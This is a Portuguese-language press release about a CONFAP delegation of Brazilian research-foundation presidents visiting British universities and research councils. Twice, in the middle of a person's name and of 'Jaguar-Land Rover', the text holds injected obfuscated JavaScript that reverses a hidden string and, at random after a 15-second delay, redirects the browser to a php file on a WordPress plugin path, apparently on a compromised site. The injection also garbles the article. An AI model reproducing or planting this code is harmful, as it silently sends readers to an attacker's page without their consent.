O grupo representa FAPs de várias regiões do Brasil (incluindo Fundação Araucária, Facepe, Fapeam, Fapeg, Fapemig, Fapema, Faperj, Fapesb e Fapesc)

 

Foto FAPESC 
 missão CONFAP Reino Unido
Missão do CONFAP no Reino Unido 

Está cheia a agenda da missão científica do Conselho Nacional das Fundações de Amparo à Pesquisa (CONFAP) ao Reino Unido. Logo no primeiro dia (21), presidentes de nove fundações brasileiras de amparo à pesquisa, entre eles Diogo Ardaillon Simões (diretor-presidente da Facepe), tiveram seis compromissos em Londres, incluindo encontros com Conselhos Britânicos de Pesquisa e uma reunião com consultores que orientam os setores público e privado sobre oportunidades ligadas aos créditos de carbono.

“Consideramos o encontro muito útil e produtivo”, disse o Prof. Mario Neto Borges, presidente da Fundação de Amparo à Pesquisa do estado de Minas Gerais. “Apostamos numa colaboração potencial entre nossas organizações”, afirmou (em inglês) Aless$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro Casoli, da Carbon Trust, entidade independente de consultoria e inovação na certificação sobre consumo de energia de produtos, entre outras atuações (detalhes na apresentação disponível no link anexo).

Na terça-feira (22), participantes da missão foram para Coventry, a fim de visitar a Universidade de Warwick, onde funciona o Centro de Inovação do grupo automotivo Jaguar-L$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Rover.

“Lá há, por exemplo, um moderno laboratório de teste e desenvolvimento de acumuladores de energia e uma das pesquisas é sobre bateria para carro elétrico, consorciada com empresas de automóveis e de baterias”, esclarece o Prof. Sergio Gargioni, presidente do CONFAP e da Fundação de Amparo à Pesquisa e Inovação do Estado de Santa Catarina.

“Um ponto a destacar é a forte relação entre universidade e empresa na pesquisa e a facilidade e a simplicidade burocrática que existe na implementação desses programas, muito diferente da infernal burocracia brasileira”, acrescenta Gargioni.

Ele e outros presidentes começaram o roteiro de quarta-feira (23) às 8hs, indo à Universidade de Birmingham. Às 14h30 já estavam no Imperial College London e terminaram a programação no Centro de Pesquisa em Energia do Reino Unido.

Nesta quinta (24), o embaixador Alan Charlton e outras autoridades recepcionaram o grupo de brasileiros, que passa o dia com acadêmicos de universidades como Cambridge e Manchester. A missão termina nesta sexta-feira, com visita ao Museu de Ciência e o feedback do grupo aos organizadores.

“Nosso foco tem sido programas públicos de pesquisa e inovação em tecnologia de baixo carbono consorciados com empresas. Seriam programas que buscam soluções de economia de energia e substituição de energias limpas de baixo impacto ambiental como a eólica, de mares, bioenergia,” resume Gargioni, que estará no Reino Unido até 25 de outubro a convite da Rede Britânica de Ciência e Inovação.

Fonte: Assessoria de Imprensa da Fapesc